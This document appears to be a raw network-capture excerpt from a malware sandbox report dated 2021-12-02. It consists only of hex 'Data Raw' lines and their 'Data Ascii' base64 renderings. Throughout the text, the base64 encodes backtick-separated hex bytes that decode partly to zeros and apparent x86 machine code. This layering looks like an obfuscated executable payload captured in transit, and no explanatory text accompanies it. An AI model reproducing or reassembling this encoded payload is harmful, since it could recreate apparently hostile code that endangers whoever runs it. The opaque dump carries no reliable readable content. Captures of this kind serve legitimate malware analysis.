                                                      2021-12-02 17:26:37 UTC752INData Raw: 42 4c 47 41 35 51 79 78 67 4e 44 67 73 59 44 4d 32 4c 47 41 31 51 69 78 67 4e 30 4d 73 59 44 41 30 4c 47 42 47 4d 53 78 67 52 6a 41 73 59 44 49 30 4c 47 42 45 4e 79 78 67 4d 6a 41 73 59 44 6b 78 4c 47 42 43 4d 79 78 67 51 6a 51 73 59 44 45 31 4c 47 41 7a 51 79 78 67 4f 44 55 73 59 44 4a 43 4c 47 41 34 52 43 78 67 4e 6b 59 73 59 44 49 35 4c 47 42 45 51 79 78 67 4d 44 4d 73 59 45 4e 44 4c 47 41 30 4d 53 78 67 4d 45 51 73 59 45 49 78 4c 47 41 78 52 69 78 67 4e 6a 49 73 59 44 56 47 4c 47 41 79 4e 53 78 67 52 55 59 73 59 44 49 34 4c 47 42 46 4d 79 78 67 4f 54 51 73 59 45 46 44 4c 47 41 34 51 79 78 67 52 54 45 73 59 44 49 35 4c 47 42 47 4d 79 78 67 51 54 6b 73 59 44 63 34 4c 47 42 46 4f 43 78 67 4d 6a 59 73 59 45 51 32 4c 47 41 7a 4d 53 78 67 51 6a 45 73 59 44
                                                      Data Ascii: BLGA5QyxgNDgsYDM2LGA1QixgN0MsYDA0LGBGMSxgRjAsYDI0LGBENyxgMjAsYDkxLGBCMyxgQjQsYDE1LGAzQyxgODUsYDJCLGA4RCxgNkYsYDI5LGBEQyxgMDMsYENDLGA0MSxgMEQsYEIxLGAxRixgNjIsYDVGLGAyNSxgRUYsYDI4LGBFMyxgOTQsYEFDLGA4QyxgRTEsYDI5LGBGMyxgQTksYDc4LGBFOCxgMjYsYEQ2LGAzMSxgQjEsYD
                                                      2021-12-02 17:26:37 UTC768INData Raw: 78 4c 47 41 78 4e 53 78 67 4e 44 55 73 59 45 4a 47 4c 47 41 34 4f 53 78 67 52 6a 59 73 59 44 45 77 4c 47 42 44 52 53 78 67 4d 54 59 73 59 44 46 45 4c 47 41 34 4e 69 78 67 52 44 59 73 59 44 4d 79 4c 47 41 78 4e 69 78 67 4f 44 6b 73 59 44 4d 33 4c 47 41 77 4d 43 78 67 4e 44 45 73 59 45 49 34 4c 47 42 45 4e 53 78 67 4e 54 6b 73 59 44 6b 78 4c 47 41 78 52 43 78 67 4f 44 55 73 59 44 4a 46 4c 47 41 31 52 53 78 67 4f 55 59 73 59 44 6b 35 4c 47 41 79 4d 79 78 67 52 54 4d 73 59 44 55 7a 4c 47 41 34 51 69 78 67 4d 30 59 73 59 44 5a 42 4c 47 42 47 51 79 78 67 4e 7a 51 73 59 44 67 35 4c 47 41 35 4f 53 78 67 4e 44 51 73 59 44 42 43 4c 47 41 34 51 53 78 67 4f 55 59 73 59 45 4a 46 4c 47 42 44 52 43 78 67 4e 7a 67 73 59 44 51 35 4c 47 42 43 52 69 78 67 4f 44 41 73 59 45
                                                      Data Ascii: xLGAxNSxgNDUsYEJGLGA4OSxgRjYsYDEwLGBDRSxgMTYsYDFELGA4NixgRDYsYDMyLGAxNixgODksYDM3LGAwMCxgNDEsYEI4LGBENSxgNTksYDkxLGAxRCxgODUsYDJFLGA1RSxgOUYsYDk5LGAyMyxgRTMsYDUzLGA4QixgM0YsYDZBLGBGQyxgNzQsYDg5LGA5OSxgNDQsYDBCLGA4QSxgOUYsYEJFLGBDRCxgNzgsYDQ5LGBCRixgODAsYE
                                                      2021-12-02 17:26:37 UTC784INData Raw: 31 4c 47 41 79 4e 43 78 67 52 55 55 73 59 44 45 32 4c 47 41 7a 52 43 78 67 52 55 49 73 59 44 55 32 4c 47 41 79 4e 79 78 67 51 7a 51 73 59 44 6b 79 4c 47 41 30 4f 53 78 67 4e 54 51 73 59 45 4e 43 4c 47 41 32 51 69 78 67 51 6a 41 73 59 45 4a 47 4c 47 42 43 4e 53 78 67 52 6a 41 73 59 45 46 44 4c 47 42 47 4f 43 78 67 4d 44 63 73 59 44 49 79 4c 47 42 46 4e 79 78 67 4d 6a 49 73 59 45 51 7a 4c 47 42 42 4d 69 78 67 4e 54 55 73 59 44 42 46 4c 47 42 47 4f 43 78 67 4e 30 51 73 59 45 59 78 4c 47 42 47 51 53 78 67 4e 30 55 73 59 44 42 45 4c 47 42 44 52 53 78 67 4d 45 49 73 59 44 67 34 4c 47 41 77 4e 79 78 67 4d 6b 59 73 59 44 5a 43 4c 47 41 31 52 69 78 67 4f 55 59 73 59 44 5a 42 4c 47 41 30 51 69 78 67 52 6a 45 73 59 44 6c 42 4c 47 41 30 51 79 78 67 4d 7a 59 73 59 44
                                                      Data Ascii: 1LGAyNCxgRUUsYDE2LGAzRCxgRUIsYDU2LGAyNyxgQzQsYDkyLGA0OSxgNTQsYENCLGA2QixgQjAsYEJGLGBCNSxgRjAsYEFDLGBGOCxgMDcsYDIyLGBFNyxgMjIsYEQzLGBBMixgNTUsYDBFLGBGOCxgN0QsYEYxLGBGQSxgN0UsYDBELGBDRSxgMEIsYDg4LGAwNyxgMkYsYDZCLGA1RixgOUYsYDZBLGA0QixgRjEsYDlBLGA0QyxgMzYsYD
                                                      2021-12-02 17:26:37 UTC800INData Raw: 79 4c 47 41 33 4f 53 78 67 52 55 49 73 59 44 67 33 4c 47 41 7a 51 79 78 67 4d 30 45 73 59 44 6b 78 4c 47 41 79 51 79 78 67 51 7a 6b 73 59 44 5a 47 4c 47 41 34 4f 43 78 67 4e 55 51 73 59 44 63 7a 4c 47 41 78 4d 53 78 67 51 6a 45 73 59 44 55 35 4c 47 42 44 4e 79 78 67 4f 54 49 73 59 44 4d 34 4c 47 41 34 4f 53 78 67 51 6a 4d 73 59 44 41 34 4c 47 42 44 4e 79 78 67 4d 54 49 73 59 44 4a 43 4c 47 41 30 51 53 78 67 4e 7a 59 73 59 44 46 43 4c 47 41 31 4e 43 78 67 4f 44 51 73 59 44 59 31 4c 47 41 35 4d 79 78 67 52 55 4d 73 59 45 51 35 4c 47 41 7a 4d 53 78 67 52 54 4d 73 59 44 49 77 4c 47 41 35 51 53 78 67 52 55 49 73 59 44 45 35 4c 47 41 33 52 69 78 67 4f 44 4d 73 59 44 64 47 4c 47 41 78 4d 53 78 67 4d 45 49 73 59 44 4e 45 4c 47 42 46 4d 53 78 67 4f 55 55 73 59 44
                                                      Data Ascii: yLGA3OSxgRUIsYDg3LGAzQyxgM0EsYDkxLGAyQyxgQzksYDZGLGA4OCxgNUQsYDczLGAxMSxgQjEsYDU5LGBDNyxgOTIsYDM4LGA4OSxgQjMsYDA4LGBDNyxgMTIsYDJCLGA0QSxgNzYsYDFCLGA1NCxgODQsYDY1LGA5MyxgRUMsYEQ5LGAzMSxgRTMsYDIwLGA5QSxgRUIsYDE5LGA3RixgODMsYDdGLGAxMSxgMEIsYDNELGBFMSxgOUUsYD
                                                      2021-12-02 17:26:37 UTC816INData Raw: 7a 4c 47 42 47 4d 43 78 67 4d 44 41 73 59 45 45 78 4c 47 41 32 4e 53 78 67 4f 45 51 73 59 44 52 47 4c 47 41 79 51 69 78 67 52 44 59 73 59 45 52 47 4c 47 41 31 4f 43 78 67 4d 55 59 73 59 45 51 78 4c 47 41 30 52 43 78 67 4d 6a 49 73 59 44 52 45 4c 47 41 78 4d 69 78 67 4e 30 59 73 59 45 56 46 4c 47 41 79 51 53 78 67 4f 44 55 73 59 44 4d 77 4c 47 42 44 51 53 78 67 4e 6a 63 73 59 44 68 44 4c 47 41 77 4d 79 78 67 51 6a 51 73 59 45 56 46 4c 47 41 31 4d 79 78 67 52 55 55 73 59 44 59 35 4c 47 41 30 4e 79 78 67 52 54 6b 73 59 44 41 77 4c 47 42 42 4f 43 78 67 4e 44 59 73 59 44 46 47 4c 47 41 30 51 53 78 67 51 6a 51 73 59 44 41 30 4c 47 41 34 4f 53 78 67 4e 7a 6b 73 59 45 4d 34 4c 47 41 32 52 69 78 67 4d 6a 41 73 59 44 59 33 4c 47 41 77 52 43 78 67 4e 45 59 73 59 45
                                                      Data Ascii: zLGBGMCxgMDAsYEExLGA2NSxgOEQsYDRGLGAyQixgRDYsYERGLGA1OCxgMUYsYEQxLGA0RCxgMjIsYDRELGAxMixgN0YsYEVFLGAyQSxgODUsYDMwLGBDQSxgNjcsYDhDLGAwMyxgQjQsYEVFLGA1MyxgRUUsYDY5LGA0NyxgRTksYDAwLGBBOCxgNDYsYDFGLGA0QSxgQjQsYDA0LGA4OSxgNzksYEM4LGA2RixgMjAsYDY3LGAwRCxgNEYsYE
                                                      2021-12-02 17:26:37 UTC832INData Raw: 31 4c 47 42 45 52 53 78 67 4d 7a 63 73 59 45 5a 42 4c 47 41 30 52 69 78 67 51 54 49 73 59 44 42 44 4c 47 41 34 51 79 78 67 4e 54 49 73 59 45 45 79 4c 47 41 78 52 53 78 67 4d 6a 4d 73 59 44 5a 47 4c 47 42 44 4d 43 78 67 52 45 4d 73 59 44 63 34 4c 47 42 45 4e 53 78 67 4f 44 49 73 59 45 4a 43 4c 47 41 34 4f 53 78 67 52 55 45 73 59 44 46 46 4c 47 41 7a 4d 69 78 67 4e 44 59 73 59 44 49 32 4c 47 42 43 4d 79 78 67 4e 6a 63 73 59 45 49 30 4c 47 42 47 51 69 78 67 4d 45 55 73 59 45 55 7a 4c 47 41 79 52 43 78 67 51 6b 55 73 59 44 67 31 4c 47 41 33 4f 43 78 67 52 6b 4d 73 59 44 59 79 4c 47 41 34 51 69 78 67 4d 55 59 73 59 45 59 79 4c 47 41 31 52 69 78 67 51 7a 59 73 59 44 46 43 4c 47 41 7a 4d 69 78 67 51 6a 59 73 59 44 52 42 4c 47 42 42 4d 69 78 67 4d 7a 49 73 59 44
                                                      Data Ascii: 1LGBERSxgMzcsYEZBLGA0RixgQTIsYDBDLGA4QyxgNTIsYEEyLGAxRSxgMjMsYDZGLGBDMCxgREMsYDc4LGBENSxgODIsYEJCLGA4OSxgRUEsYDFFLGAzMixgNDYsYDI2LGBCMyxgNjcsYEI0LGBGQixgMEUsYEUzLGAyRCxgQkUsYDg1LGA3OCxgRkMsYDYyLGA4QixgMUYsYEYyLGA1RixgQzYsYDFCLGAzMixgQjYsYDRBLGBBMixgMzIsYD
                                                      2021-12-02 17:26:37 UTC848INData Raw: 46 4c 47 41 35 4d 69 78 67 4e 44 63 73 59 45 51 35 4c 47 42 46 4d 53 78 67 4f 54 45 73 59 44 45 35 4c 47 42 44 51 69 78 67 4e 7a 59 73 59 44 68 47 4c 47 42 45 51 69 78 67 4f 44 6b 73 59 45 45 31 4c 47 41 78 4d 69 78 67 51 6b 51 73 59 45 56 42 4c 47 41 32 51 79 78 67 51 55 59 73 59 45 51 34 4c 47 42 45 4e 79 78 67 4f 44 63 73 59 45 5a 44 4c 47 41 35 52 43 78 67 51 6a 45 73 59 45 45 33 4c 47 41 35 4d 69 78 67 52 45 59 73 59 44 45 78 4c 47 41 33 52 53 78 67 4f 54 63 73 59 45 52 46 4c 47 42 44 52 43 78 67 52 54 63 73 59 44 42 47 4c 47 42 47 4f 53 78 67 4d 6b 51 73 59 44 59 77 4c 47 41 79 4f 53 78 67 4d 30 51 73 59 44 45 35 4c 47 41 77 4f 53 78 67 4d 44 41 73 59 44 4e 46 4c 47 41 7a 4d 69 78 67 4f 55 59 73 59 44 59 79 4c 47 41 34 4d 79 78 67 4d 6a 51 73 59 44
                                                      Data Ascii: FLGA5MixgNDcsYEQ5LGBFMSxgOTEsYDE5LGBDQixgNzYsYDhGLGBEQixgODksYEE1LGAxMixgQkQsYEVBLGA2QyxgQUYsYEQ4LGBENyxgODcsYEZDLGA5RCxgQjEsYEE3LGA5MixgREYsYDExLGA3RSxgOTcsYERFLGBDRCxgRTcsYDBGLGBGOSxgMkQsYDYwLGAyOSxgM0QsYDE5LGAwOSxgMDAsYDNFLGAzMixgOUYsYDYyLGA4MyxgMjQsYD
                                                      2021-12-02 17:26:37 UTC864INData Raw: 33 4c 47 41 77 52 69 78 67 52 6b 59 73 59 44 45 35 4c 47 42 45 4e 79 78 67 52 6b 45 73 59 44 56 47 4c 47 42 47 51 79 78 67 4f 44 63 73 59 45 5a 46 4c 47 42 44 52 69 78 67 4d 30 59 73 59 45 59 34 4c 47 42 47 51 69 78 67 52 6a 67 73 59 45 5a 42 4c 47 41 34 52 69 78 67 4f 54 49 73 59 45 4a 47 4c 47 41 33 52 69 78 67 52 54 45 73 59 44 4e 47 4c 47 42 47 4e 43 78 67 4e 45 49 73 59 44 4e 46 4c 47 42 47 4f 53 78 67 4d 55 49 73 59 45 59 77 4c 47 42 47 4e 79 78 67 52 45 59 73 59 44 49 32 4c 47 41 33 52 69 78 67 52 6b 59 73 59 45 55 78 4c 47 42 47 52 69 78 67 52 44 41 73 59 45 4a 47 4c 47 42 47 52 53 78 67 4f 45 59 73 59 44 46 47 4c 47 42 46 4d 79 78 67 52 55 59 73 59 45 4a 47 4c 47 41 30 4f 43 78 67 52 6b 55 73 59 45 5a 46 4c 47 42 44 4e 79 78 67 52 6b 59 73 59 45
                                                      Data Ascii: 3LGAwRixgRkYsYDE5LGBENyxgRkEsYDVGLGBGQyxgODcsYEZFLGBDRixgM0YsYEY4LGBGQixgRjgsYEZBLGA4RixgOTIsYEJGLGA3RixgRTEsYDNGLGBGNCxgNEIsYDNFLGBGOSxgMUIsYEYwLGBGNyxgREYsYDI2LGA3RixgRkYsYEUxLGBGRixgRDAsYEJGLGBGRSxgOEYsYDFGLGBFMyxgRUYsYEJGLGA0OCxgRkUsYEZFLGBDNyxgRkYsYE
                                                      2021-12-02 17:26:37 UTC880INData Raw: 47 4c 47 42 43 52 43 78 67 4e 30 59 73 59 44 51 34 4c 47 42 44 4f 43 78 67 52 6b 49 73 59 45 46 47 4c 47 42 47 52 43 78 67 4e 7a 55 73 59 45 45 33 4c 47 41 33 52 69 78 67 4d 7a 67 73 59 45 5a 47 4c 47 41 31 4d 69 78 67 52 6b 59 73 59 44 42 47 4c 47 42 43 52 69 78 67 51 6b 51 73 59 44 68 44 4c 47 42 46 4d 69 78 67 4d 7a 63 73 59 44 64 45 4c 47 42 43 4d 53 78 67 51 55 55 73 59 45 59 35 4c 47 41 35 4e 79 78 67 4e 54 63 73 59 45 5a 47 4c 47 42 47 4e 79 78 67 4f 45 49 73 59 45 4a 47 4c 47 41 35 51 69 78 67 4e 30 59 73 59 45 59 35 4c 47 42 46 4d 79 78 67 52 6b 59 73 59 45 49 33 4c 47 42 46 51 53 78 67 4d 6a 63 73 59 44 41 31 4c 47 42 44 52 53 78 67 4e 30 59 73 59 45 5a 42 4c 47 42 46 4d 43 78 67 51 6a 63 73 59 45 55 32 4c 47 41 31 52 69 78 67 52 6b 55 73 59 45
                                                      Data Ascii: GLGBCRCxgN0YsYDQ4LGBDOCxgRkIsYEFGLGBGRCxgNzUsYEE3LGA3RixgMzgsYEZGLGA1MixgRkYsYDBGLGBCRixgQkQsYDhDLGBFMixgMzcsYDdELGBCMSxgQUUsYEY5LGA5NyxgNTcsYEZGLGBGNyxgOEIsYEJGLGA5QixgN0YsYEY5LGBFMyxgRkYsYEI3LGBFQSxgMjcsYDA1LGBDRSxgN0YsYEZBLGBFMCxgQjcsYEU2LGA1RixgRkUsYE
                                                      2021-12-02 17:26:37 UTC896INData Raw: 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44
                                                      Data Ascii: sYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMDAsYDAwLGAwMCxgMD
                                                      2021-12-02 17:26:37 UTC912INData Raw: 73 59 44 41 34 4c 47 41 77 51 69 78 67 51 30 45 73 59 44 42 47 4c 47 42 43 4e 69 78 67 4e 54 41 73 59 44 42 46 4c 47 41 34 4d 53 78 67 52 54 45 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 4d 53 78 67 52 54 49 73 59 45 5a 47 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 41 77 4c 47 42 44 4d 53 78 67 52 54 45 73 59 44 41 34 4c 47 41 77 51 69 78 67 51 30 45 73 59 44 42 47 4c 47 42 43 4e 69 78 67 4e 54 41 73 59 44 42 47 4c 47 42 45 4d 53 78 67 52 55 45 73 59 45 4d 78 4c 47 42 46 4d 53 78 67 4d 44 63 73 59 44 42 43 4c 47 42 44 51 53 78 67 4f 45 45 73 59 44 55 77 4c 47 41 77 51 69 78 67 52 6a 59 73 59 45 4d 79 4c 47 41 77 4d 53 78 67 4e 7a 51 73 59 44 41 32 4c 47 41 34 4d 53 78 67 51 7a 6b 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44
                                                      Data Ascii: sYDA4LGAwQixgQ0EsYDBGLGBCNixgNTAsYDBFLGA4MSxgRTEsYEZGLGBGRixgMDAsYDAwLGA4MSxgRTIsYEZGLGBGRixgRkYsYDAwLGBDMSxgRTEsYDA4LGAwQixgQ0EsYDBGLGBCNixgNTAsYDBGLGBEMSxgRUEsYEMxLGBFMSxgMDcsYDBCLGBDQSxgOEEsYDUwLGAwQixgRjYsYEMyLGAwMSxgNzQsYDA2LGA4MSxgQzksYDAwLGAwMCxgMD
                                                      2021-12-02 17:26:37 UTC928INData Raw: 73 59 45 5a 45 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 4a 43 4c 47 41 78 4f 53 78 67 4d 54 6b 73 59 44 4d 79 4c 47 42 44 4e 79 78 67 4f 44 55 73 59 44 4a 44 4c 47 42 47 52 43 78 67 52 6b 59 73 59 45 5a 47 4c 47 41 35 4e 53 78 67 4e 7a 4d 73 59 44 63 7a 4c 47 42 46 4e 69 78 67 51 7a 63 73 59 44 67 31 4c 47 41 7a 4d 43 78 67 52 6b 51 73 59 45 5a 47 4c 47 42 47 52 69 78 67 51 54 41 73 59 44 59 77 4c 47 41 32 4d 43 78 67 51 7a 41 73 59 45 4d 33 4c 47 41 34 4e 53 78 67 4d 7a 51 73 59 45 5a 45 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 6b 34 4c 47 41 34 4d 53 78 67 4f 44 45 73 59 44 45 35 4c 47 42 44 4e 79 78 67 4f 44 55 73 59 44 4d 34 4c 47 42 47 52 43 78 67 52 6b 59 73 59 45 5a 47 4c 47 42 45 4d 53 78 67 4e 45 59 73 59 44 52 47 4c 47 41 35 52 53 78 67 51 7a
                                                      Data Ascii: sYEZELGBGRixgRkYsYDJCLGAxOSxgMTksYDMyLGBDNyxgODUsYDJDLGBGRCxgRkYsYEZGLGA5NSxgNzMsYDczLGBFNixgQzcsYDg1LGAzMCxgRkQsYEZGLGBGRixgQTAsYDYwLGA2MCxgQzAsYEM3LGA4NSxgMzQsYEZELGBGRixgRkYsYDk4LGA4MSxgODEsYDE5LGBDNyxgODUsYDM4LGBGRCxgRkYsYEZGLGBEMSxgNEYsYDRGLGA5RSxgQz
                                                      2021-12-02 17:26:37 UTC944INData Raw: 73 59 45 5a 47 4c 47 42 44 52 53 78 67 4d 7a 59 73 59 44 5a 47 4c 47 41 30 51 53 78 67 51 7a 63 73 59 44 67 31 4c 47 42 47 4f 43 78 67 52 6a 6b 73 59 45 5a 47 4c 47 42 47 52 69 78 67 52 44 51 73 59 44 41 35 4c 47 41 35 52 69 78 67 52 55 45 73 59 45 4d 33 4c 47 41 34 4e 53 78 67 52 6b 4d 73 59 45 59 35 4c 47 42 47 52 69 78 67 52 6b 59 73 59 45 51 32 4c 47 41 33 51 79 78 67 51 6a 41 73 59 44 49 35 4c 47 42 44 4e 79 78 67 4f 44 55 73 59 44 41 77 4c 47 42 47 51 53 78 67 52 6b 59 73 59 45 5a 47 4c 47 42 42 52 69 78 67 51 6a 49 73 59 45 45 30 4c 47 41 7a 4d 53 78 67 51 7a 63 73 59 44 67 31 4c 47 41 77 4e 43 78 67 52 6b 45 73 59 45 5a 47 4c 47 42 47 52 69 78 67 4d 7a 45 73 59 44 49 7a 4c 47 41 7a 52 69 78 67 4d 6b 45 73 59 45 4d 33 4c 47 41 34 4e 53 78 67 4d 44
                                                      Data Ascii: sYEZGLGBDRSxgMzYsYDZGLGA0QSxgQzcsYDg1LGBGOCxgRjksYEZGLGBGRixgRDQsYDA5LGA5RixgRUEsYEM3LGA4NSxgRkMsYEY5LGBGRixgRkYsYEQ2LGA3QyxgQjAsYDI5LGBDNyxgODUsYDAwLGBGQSxgRkYsYEZGLGBBRixgQjIsYEE0LGAzMSxgQzcsYDg1LGAwNCxgRkEsYEZGLGBGRixgMzEsYDIzLGAzRixgMkEsYEM3LGA4NSxgMD
                                                      2021-12-02 17:26:37 UTC960INData Raw: 73 59 44 67 78 4c 47 42 46 4d 79 78 67 52 6b 59 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 42 47 4c 47 42 43 4e 69 78 67 4e 55 4d 73 59 44 6b 34 4c 47 41 77 4e 53 78 67 4d 7a 4d 73 59 45 5a 43 4c 47 41 7a 4d 79 78 67 4d 7a 6b 73 59 44 68 43 4c 47 42 45 52 69 78 67 51 7a 45 73 59 45 4e 43 4c 47 41 77 4f 43 78 67 4f 44 45 73 59 45 55 7a 4c 47 41 77 4d 43 78 67 52 6b 59 73 59 44 41 77 4c 47 42 47 52 69 78 67 51 7a 45 73 59 45 4d 33 4c 47 41 77 4f 43 78 67 4f 44 45 73 59 45 55 33 4c 47 42 47 52 69 78 67 4d 44 41 73 59 45 5a 47 4c 47 41 77 4d 43 78 67 4d 45 49 73 59 45 52 47 4c 47 41 34 51 69 78 67 4e 30 51 73 59 44 42 44 4c 47 41 34 4f 53 78 67 4d 55 59 73 59 44 68 43 4c 47 41 31 52 43 78 67 52 6a 51 73 59 45 4d 78 4c 47 42 47 51 69 78 67 4d 54
                                                      Data Ascii: sYDgxLGBFMyxgRkYsYDAwLGAwMCxgMDAsYDBGLGBCNixgNUMsYDk4LGAwNSxgMzMsYEZCLGAzMyxgMzksYDhCLGBERixgQzEsYENCLGAwOCxgODEsYEUzLGAwMCxgRkYsYDAwLGBGRixgQzEsYEM3LGAwOCxgODEsYEU3LGBGRixgMDAsYEZGLGAwMCxgMEIsYERGLGA4QixgN0QsYDBDLGA4OSxgMUYsYDhCLGA1RCxgRjQsYEMxLGBGQixgMT
                                                      2021-12-02 17:26:37 UTC976INData Raw: 73 59 44 67 35 4c 47 41 35 4e 53 78 67 4f 54 41 73 59 45 5a 46 4c 47 42 47 52 69 78 67 52 6b 59 73 59 45 55 34 4c 47 41 78 51 69 78 67 4e 30 55 73 59 44 41 78 4c 47 41 77 4d 43 78 67 4f 45 51 73 59 44 68 47 4c 47 41 79 4d 43 78 67 4e 44 6b 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4e 54 45 73 59 44 68 45 4c 47 41 35 4e 53 78 67 4e 7a 67 73 59 45 5a 46 4c 47 42 47 52 69 78 67 52 6b 59 73 59 44 55 79 4c 47 41 31 4e 69 78 67 52 54 67 73 59 45 49 33 4c 47 41 32 52 53 78 67 4d 44 41 73 59 44 41 77 4c 47 41 34 4d 79 78 67 51 7a 51 73 59 44 51 34 4c 47 41 34 4d 79 78 67 51 6b 55 73 59 45 59 30 4c 47 41 77 4f 53 78 67 4d 44 41 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4f 45 51 73 59 44 67 33 4c 47 41 30 4d 43 78 67 52 44 67 73 59 44 46 47 4c 47 41 77 4d 43 78 67 4f 44
                                                      Data Ascii: sYDg5LGA5NSxgOTAsYEZFLGBGRixgRkYsYEU4LGAxQixgN0UsYDAxLGAwMCxgOEQsYDhGLGAyMCxgNDksYDAwLGAwMCxgNTEsYDhELGA5NSxgNzgsYEZFLGBGRixgRkYsYDUyLGA1NixgRTgsYEI3LGA2RSxgMDAsYDAwLGA4MyxgQzQsYDQ4LGA4MyxgQkUsYEY0LGAwOSxgMDAsYDAwLGAwMCxgOEQsYDg3LGA0MCxgRDgsYDFGLGAwMCxgOD
                                                      2021-12-02 17:26:37 UTC992INData Raw: 73 59 45 4d 30 4c 47 41 7a 4f 43 78 67 4f 44 55 73 59 45 4d 77 4c 47 41 33 4e 53 78 67 4d 55 45 73 59 44 67 31 4c 47 42 45 51 69 78 67 4e 7a 51 73 59 44 42 42 4c 47 41 31 4d 79 78 67 4e 54 59 73 59 45 55 34 4c 47 41 33 4e 53 78 67 4e 7a 45 73 59 44 41 78 4c 47 41 77 4d 43 78 67 4f 44 4d 73 59 45 4d 30 4c 47 41 77 4f 43 78 67 4e 55 59 73 59 44 56 46 4c 47 42 43 4f 43 78 67 4d 44 51 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 56 43 4c 47 41 34 51 69 78 67 52 54 55 73 59 44 56 45 4c 47 42 44 4d 79 78 67 4f 45 49 73 59 44 55 31 4c 47 41 77 51 79 78 67 4f 45 49 73 59 44 51 31 4c 47 41 78 4d 43 78 67 4e 6b 45 73 59 44 41 77 4c 47 41 32 51 53 78 67 4d 55 49 73 59 44 68 45 4c 47 41 34 52 43 78 67 4f 54 67 73 59 45 5a 46 4c 47 42 47 52 69 78 67 52 6b
                                                      Data Ascii: sYEM0LGAzOCxgODUsYEMwLGA3NSxgMUEsYDg1LGBEQixgNzQsYDBBLGA1MyxgNTYsYEU4LGA3NSxgNzEsYDAxLGAwMCxgODMsYEM0LGAwOCxgNUYsYDVFLGBCOCxgMDQsYDAwLGAwMCxgMDAsYDVCLGA4QixgRTUsYDVELGBDMyxgOEIsYDU1LGAwQyxgOEIsYDQ1LGAxMCxgNkEsYDAwLGA2QSxgMUIsYDhELGA4RCxgOTgsYEZFLGBGRixgRk
                                                      2021-12-02 17:26:37 UTC1008INData Raw: 73 59 44 45 79 4c 47 42 47 4e 69 78 67 4d 44 41 73 59 44 41 77 4c 47 41 32 4f 43 78 67 51 6a 67 73 59 44 67 79 4c 47 41 30 4f 43 78 67 51 7a 67 73 59 44 5a 42 4c 47 41 77 4d 43 78 67 4e 6b 45 73 59 44 41 77 4c 47 41 31 4d 79 78 67 4e 54 63 73 59 44 67 35 4c 47 41 34 4e 69 78 67 4d 44 41 73 59 44 42 45 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 45 55 34 4c 47 42 47 51 79 78 67 52 6a 55 73 59 44 41 77 4c 47 41 77 4d 43 78 67 4e 6a 67 73 59 45 59 35 4c 47 41 31 4e 43 78 67 52 54 6b 73 59 44 51 30 4c 47 41 32 51 53 78 67 4d 44 41 73 59 44 67 35 4c 47 41 34 4e 69 78 67 4d 44 67 73 59 44 42 45 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 68 43 4c 47 41 34 4e 69 78 67 51 54 41 73 59 44 42 43 4c 47 41 77 4d 43 78 67 4d 44 41 73 59 44 5a 42 4c 47 41 77 4d 43 78 67 4e 54
                                                      Data Ascii: sYDEyLGBGNixgMDAsYDAwLGA2OCxgQjgsYDgyLGA0OCxgQzgsYDZBLGAwMCxgNkEsYDAwLGA1MyxgNTcsYDg5LGA4NixgMDAsYDBELGAwMCxgMDAsYEU4LGBGQyxgRjUsYDAwLGAwMCxgNjgsYEY5LGA1NCxgRTksYDQ0LGA2QSxgMDAsYDg5LGA4NixgMDgsYDBELGAwMCxgMDAsYDhCLGA4NixgQTAsYDBCLGAwMCxgMDAsYDZBLGAwMCxgNT
                                                      2021-12-02 17:26:37 UTC1024INData Raw: 73 59 45 59 35 4c 47 41 34 51 69 78 67 4e 7a 51 73 59 44 41 7a 4c 47 41 34 4f 53 78 67 4e 7a 41 73 59 44 41 34 4c 47 41 34 4d 43 78 67 52 6a 6b 73 59 44 63 31 4c 47 41 33 4e 43 78 67 4d 44 4d 73 59 44 67 35 4c 47 41 33 4d 43 78 67 4d 45 4d 73 59 44 4d 35 4c 47 41 7a 4d 43 78 67 4e 7a 55 73 59 44 42 47 4c 47 41 7a 4f 53 78 67 4e 7a 41 73 59 44 41 30 4c 47 41 33 4e 53 78 67 4d 45 45 73 59 44 4d 35 4c 47 41 33 4d 43 78 67 4d 44 67 73 59 44 63 31 4c 47 41 77 4e 53 78 67 4d 7a 6b 73 59 44 63 77 4c 47 41 77 51 79 78 67 4e 7a 51 73 59 45 4d 31 4c 47 41 34 51 53 78 67 4e 45 59 73 59 44 41 79 4c 47 41 34 4d 43 78 67 52 6a 6b 73 59 44 45 77 4c 47 41 33 4e 43 78 67 4d 44 49 73 59 44 67 35 4c 47 41 7a 4d 43 78 67 4f 44 41 73 59 45 59 35 4c 47 41 77 4f 43 78 67 